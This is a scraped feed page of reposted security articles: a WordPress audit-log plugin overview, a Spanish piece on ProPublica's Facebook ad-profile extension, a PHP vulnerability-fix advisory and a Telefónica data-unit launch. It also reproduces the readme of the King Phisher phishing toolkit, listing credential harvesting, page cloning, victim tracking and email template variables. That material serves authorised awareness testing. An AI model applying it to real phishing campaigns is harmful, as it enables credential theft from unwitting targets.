The above are just a few reasons mostly related to WordPress security of why you would need to keep a record of all the changes that happen on your WordPress. There are many other reasons related to business and operations, for example to ensure that your business WordPress website meets today’s stringent regulatory compliance regulations, in case you’re using WordPress for your business website.

Getting Started with the WP Security Audit Log Plugin

Install the WP Security Audit Log plugin from your Plugins page in your WordPress dashboard and activate it. By default the WP Security Audit Log will keep track of all these changes on your WordPress. You can also watch the short video below for a quick introduction.


Comprehensive Tracking of WordPress Changes

The comprehensive WordPress audit trail is what sets this plugin apart from the competition. For example while the other audit log plugins simply record that a post was updated, WP Security Audit Log tells you what exactly changed in the post. For example in the screenshot below we can see that the plugin kept a record when all of the below changes happened:

  • User opened the post in the editor,
  • Author of the post was changed,
  • Title of the post was changed,
  • URL of the post was changed



In case the content is changed the alert reporting the change in the plugin will allow you to see the revision of changes, as per the below screenshot.


Fully Configurable WordPress Audit Trail Plugin

WP Security Audit Log is also a fully configurable WordPress plugin, therefore it allows you to customize the plugin’s functionality to suite your own needs. Below is an overview of what you can configure.

Enable / Disable Alerts

The plugin keeps a record of all these WordPress changes. If for example you do not want to keep a record each time a logged in user, or a website visitor requests a non-existing page (HTTP 404 Error) navigate to the Enable/Disable Alerts> System Activity tab and disable Alert 6007 as shown in the below screenshot.


Browse through the different categories to find the change you would like to disable or enable back.

Generic Plugin Settings

You can also configure things such as:
  • Support for WAFs and reverse proxy (more information on this option),
  • Specify who can access the plugin’s settings and manage it,
  • Enable logging, developer options,
  • And much more.

Audit Trail Settings

In the Audit Log / Trail settings you can configure settings related to the WordPress audit trail, such as:
  • Automatic pruning of alerts from the audit trail,
  • Who can view the WordPress audit trial,
  • The time zone the plugin uses to timestamp the WordPress changes etc.

Exclude Objects from Monitoring

You can also exclude the below from being recorded in the WordPress audit trial:
  • Specific users or roles,
  • Custom fields,
  • IP addresses.

Beefing Up the WordPress Audit Trail

Keeping an audit trail of all the changes that happen is a WordPress security best practice but who has the time to check the log every few minutes? The good news is that you do not need to. WP Security Audit Log has a number of premium add-ons so you can:
  • Configure email notifications so you are alerted instantly via email of important changes on your WordPress,
  • Do free text based searches so you can find that specific change when troubleshooting an issue,
  • Generate reports for managers, to monitor users’ productivity and for regulatory compliance reasons,
  • See who is logged in and block multiple sessions from the same username.

 You can add all of the above functionality to get the best out of your WordPress audit trail solution by purchasing the All Add-Ons bundle. Prices start from as low as $89.



Via:www.kitploit.com

¿Quieres saber cómo piensa Facebook que eres y qué te gusta?

$
0
0
Hoy en día estamos ante una era en la que la sociedad y el ser humano viven en una constante automatización. La tecnología avanza rápido y nos encontramos en un instante en el que las máquinas pueden aprender, inferir comportamientos de seres humanos y, en definitiva, producir juicios basados en datos. Cada día que pasa, las sistemas inteligentes toman más decisiones por nosotros que van desde la publicidad que nos ponen, hasta conducir nuestro vehículo, pasando por llamar a un técnico para solicitar una reparación.

Figura 1: ¿Quieres saber cómo piensa Facebook que eres y qué te gusta?

De todos ellos, los que se focalizan en darnos servicio necesitan aprender lo máximo de nosotros para alimentar sus algoritmos de Machine Learning. Desde el recomendador de películas de Netflix, hasta los asistentes virtuales como Google Now o Cortana. Todos ellos van haciendo un perfil nuestro en base a los datos que van capturando. Pero... ¿qué perfil se hacen de nosotros?. Esta pregunta común entre las personas que intentamos conocer cómo funcionan estos algoritmos.

El caso de Facebook es un caso muy particular que tiene un interés especial, ya que es para muchos el principal método de socialización. Es cómo un individuo se muestra públicamente ante amigos, conocidos, presentes, pasados y/o futuros. Es la imagen social de muchos millones de personas en el mundo pero... ¿te has parado a pensar cómo será esa imagen para el algoritmo de Facebook? Esto es lo que se intenta responder con esta herramienta.

¿Qué sabe Facebook de mí?

La gente de ProPublica ha liberado una extensión para Google Chrome que permite recoger las categorías que Facebook tiene sobre su perfil. La extensión se basa en un proceso de análisis de tu cuenta para recopilar la información de las categorías que Facebook está utilizando en sus algoritmos para clasificarte, sobre gustos e intereses.

Figura 2: What Facebook Thinks You Like

Facebook tiene un conjunto grande de usuarios, con más de mil cuatrocientos millones cuentas. Cada vez que un usuario de Facebook indica que le gusta un mensaje, etiqueta una fotografía o actualiza sus películas favoritas en su perfil, Facebook lo registra. Cuando un usuario navega por la web, Facebook recopila información sobre las páginas visitadas que contienen el botón de compartir. Cuando se utiliza Instagram o Whatsapp, los cuales son propiedad de Facebook, se están aportando más datos al expediente que la empresa tiene de cada usuario. Con todas esas interacciones se hace tu perfil y categorización.

Según la gente de ProPublica, en caso de que estas acciones no sean suficientes, Facebook también realiza compra de datos a empresas que aporta información que pueden ser interesante, como por ejemplo las hipotecas de sus usuarios, la propiedad de automóviles o los hábitos de compras. Esto se hace a través de los grandes Data Brokers o de acuerdos puntuales. Muchos pueden preguntarse, Facebook utiliza todos estos datos para ofrecer a los vendedores la oportunidad de orientar los anuncios a grupos específicos de personas con una mayor granularidad.

En otras palabras, si Facebook consigue clasificar a los usuarios en grupos o categorías de forma exhaustiva, mayor será la probabilidad de que el impacto de la publicidad sobre el usuario tenga mayor éxito porque se ha definido mejor el colectivo en el que se ha incluido a cada usuario. Con este granularidad, las  herramientas para contratar la publicidad de forma dirigida en la red social permiten seleccionar grupos de objetivos en los que se seleccione, por ejemplo, usuarios menos de 25 años, que les guste viajar y que no tengan grandes recursos económicos, que podrían ser un público objetivo para empresas de viajes low-cost.

Con la extensión de ProPublica se puede ver lo que Facebook cree que sabe de ti. Lo que la extensión recopila es la misma información que la compañía ofrece a sus usuarios en la sección de Ad Preferences o preferencias de anuncios. Lo que no queda claro aún, pero muchos pueden intuir, es si esto es todo lo que Facebook sabe de uno o, realmente, conoce mucho más datos que no están disponibles.

Figura 3: Categorías de intereses para anunciantes

Como puede verse, Facebook clasifica los intereses de una persona en diferentes categorías. Esta misma información que ellos proporcionan a cada usuario en su apartado de AdPreferences es la que se utiliza para dirigir la publicidad. También, se informa de qué anunciantes han visitado la información del contacto.

ProPublica plantea un esquema para intentar averiguar si lo que dice Facebook que sabe sobre los usuarios son realmente las categorías en que debería estar un usuario. Este experimento solicita información a los usuarios, a través de un proceso de encuesta para saber si realmente tienen esos intereses en los que están catalogados o no. Puedes inscribirte en el experimento y, al finalizar el proyecto, se enviará un e-mail con los resultados de todo esto.

Figura4: ¿Tienes estos intereseses? ¡¡¡No mientas!!!!


Nosotros hemos estado haciendo una pequeña prueba de cómo Facebook ha ido recopilando la información y qué sabía de una cuenta ficticia creada. Analizando las 14 categorías de nuestra pequeña prueba podemos ver algunas cosas de interés:
• El usuario es clasificado en dicha categoría porque instaló una aplicación. Es el ejemplo de Canva, aplicación en Facebook. Se asume que te gusta o interesa, ya que has mostrado cierto interés instalándolo.
• El usuario es clasificado en dicha categoría porque directamente ha indicado que le gusta una página relacionada con un tema.
• El usuario es clasificado en dicha categoría porque Facebook recopila información desde el propio perfil. Por ejemplo, si exponemos que somos estudiantes, nos clasifica y seríamos un target concreto para publicidad.
• El usuario es clasificado en dicha categoría porque Facebook ha inferido qué tipo de actividad realizar en el sitio.
• El usuario es clasificado en algún tipo de gusto o categoría, debido a qué software utiliza de forma externa, es el caso del navegador.
El propio Facebook, intentando ser transparente, proporciona información sobre qué utiliza para llegar al público adecuado. El apartado de categorías de socios puede llamar mucho la atención de los usuarios. Según algunos informes, Facebook dispone de más de 1.300 categorías o formas de clasificarte, por lo que la segmentación en este campo es enorme.

Figura: Categorías para la clasificación

En definitiva, el objetivo que esta extensión persigue es ver si lo que Facebook dice que sabe de un usuario coincide con las categorías de anuncios que, posteriormente, vende. Para intentar conocer más cómo funciona el negocio de los datos en estas grandes empresas de Internet hoy en día.  Si te interesa este tema, debes leerte los artículos de "Cómo Twitter saber cuáles son los cereales que desayunas" o "Cuánto valen tus datos de Facebook".

Autor: Pablo González Pérez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y “Pentesting con Powershell

Via:www.elladodelmal.com

King Phisher 1.5.2 - Phishing Campaign Toolkit

$
0
0

King Phisher is a tool for testing and promoting user awareness by simulating real world phishing attacks. It features an easy to use, yet very flexible architecture allowing full control over both emails and server content. King Phisher can be used to run campaigns ranging from simple awareness training to more complicated scenarios in which user aware content is served for harvesting credentials.
King Phisher is only to be used for legal applications when the explicit permission of the targeted organization has been obtained.
Get the latest stable version from the GitHub Releases Page or use git to checkout the project from source.
For instructions on how to install, please see the INSTALL.md file. After installing, for instructions on how to get started please see the wiki .

Feature Overview
  • Run multiple phishing campaigns simultaneously
  • Send email with embedded images for a more legitimate appearance
  • Optional Two-Factor authentication
  • Credential harvesting from landing pages
  • SMS alerts regarding campaign status
  • Web page cloning capabilities
  • Integrated Sender Policy Framework (SPF) checks
  • Geo location of phishing visitors
  • Send email with calendar invitations

Plugins
Both the client and server can be extended with functionality provided by plugins. A small number of plugins are packaged with King Phisher and additional ones are available in the Plugins repository .

Template Files
Template files for both messages and server pages can be found in the separate King Phisher Templates repository . Any contributions regarding templates should also be submitted via a pull request to the templates repository.

Message Template Variables
The client message templates are formatted using the Jinja2 templating engine and support a number of variables. These are included here as a reference, check the templates wiki page for comprehensive documentation.
Variable Name Variable Value
client.company_name The target's company name
client.email_address The target's email address
client.first_name The target's first name
client.last_name The target's last name
client.message_id The unique tracking identifier (this is the same as uid)
sender.email The email address in the "Source Email (MIME)" field
sender.friendly_alias The value of the "Friendly Alias" field
sender.reply_to The value of the "Reply To" field
url.tracking_dot URL of an image used for message tracking
url.webserver Phishing server URL with the uid parameter
url.webserver_raw Phishing server URL without any parameters
tracking_dot_image_tag The tracking image in a preformatted <img /> tag
uid The unique tracking identifier (this is the same as client.message_id)
The uid is the most important, and must be present in links that the messages contain.

Documentation
Documentation for users of the application is provided on the project's wiki page . This includes steps to help new users get started with their first campaigns. Additional technical documentation intended for developers is kept seperate as outlined in section below.

Code Documentation
King Phisher uses Sphinx for internal technical documentation. This documentation can be generated from source with the command sphinx-build -b html docs/source docs/html . The latest documentation is kindly hosted on ReadTheDocs at king-phisher.readthedocs.io .

License
King Phisher is released under the BSD 3-clause license, for more details see the LICENSE file.

Credits
Special Thanks (QA / Beta Testing):
  • Jake Garlie - jagar
  • Jeremy Schoeneman - Shad0wman
  • Ken Smith - p4tchw0rk
  • Brianna Whittaker
King Phisher Development Team:



Via:www.kitploit.com

Nuevas versiones de PHP corrigen múltiples vulnerabilidades

$
0
0
El equipo de desarrollo de PHP ha publicado actualizaciones para las ramas 7.0 y 5.6de PHPpara solucionar múltiples vulnerabilidades que pueden ser aprovechadas para provocar denegaciones de servicio e incluso comprometer los sistemas afectados. 

Son múltiples las vulnerabilidades corregidas, aunque ninguna de ellas tiene asignado CVE. En el propio núcleo de PHP los problemas incluyen, entre otros, un desbordamiento de búfer en virtual_popen de zend_virtual_cwd.c, lectura fuera de límites por password_verify, escritura fuera de límites en number_format o uso de memoria después de liberarla en unserialize().

Además del núcleo se ven afectados un gran número de componentes: BCmath, COM, Date, DOM, Filter, GD, Intl, Mbstring, Mysqlnd, Opcache, OpenSSL, PCRE, PDO_DBlib, phpdbg, Session, SimpleXML, SOAP, SPL y Zip. Además en PHP 7 se ha actualizado SQLite3 a la versión 3.14.2.

Se recomienda actualizar a las nuevas versiones 7.0.12y 5.6.27desde

Más información:

PHP 7 ChangeLog
Version 7.0.12

PHP 5 ChangeLog
Version 5.6.27




Antonio Ropero

Twitter: @aropero

Via:unaaldia.hispasec.com

LUCA: Data-Driven Decissions

$
0
0
Ayer fue un día importante para nosotros. Era la fecha que habíamos marcado a fuego en el calendario para lanzar nuestra nueva unidad centrada en ayudar a las empresas a ser Data-Driven Companies, y en la que hemos puesto mucho esfuerzo y cariño. La marca con la que ha nacido esta unidad es LUCA: Data-Driven Decissions y  en ella hemos aglutinado mucho músculo.

Figura 1: LUCA D3 "Data-Driven Decissions"

En la keynote de LUCA quisimos que vieran muchas de las cosas que hemos estado haciendo internamente para lanzar los servicios externamente. Para ello preparamos algunas demos de productos y proyectos que hemos creado en Telefónica en los últimos tiempos y que forman parte de esta nueva unidad.


Figura 2: Vídeo de presentación de LUCA D3 "Data-Driven Decissions"

Dentro de LUCA se encuentra Synergic Partners, la empresa adquirida por Telefónica en el año 2015, las plataformas SmartSteps y SmartDigits, más los nuevos productos que estamos desarrollando para que los clientes puedan tener acceso a sus datos con sistemas de analítica descriptiva y analítica predictiva, como el de comunicaciones empresariales del que puede hacer una demo en el escenario.

Figura 3: Analítica descriptiva de comunicaciones de una empresa con LUCA SmartComms

Esto es solo un principio, y por supuesto os iré contando mucho más por aquí, pero al igual que ElevenPaths, la unidad LUCA tendrá sus propios medios de comunicación, por lo que podéis estar en contacto con nosotros a través de la página web de LUCA y de la cuenta Twitter de LUCA.

Saludos Malignos!

PD: En cuanto estén los vídeos del evento de ayer disponibles os lo pongo para que los podáis ver.

Via:www.elladodelmal.com
Viewing all 1954 articles
Browse latest View live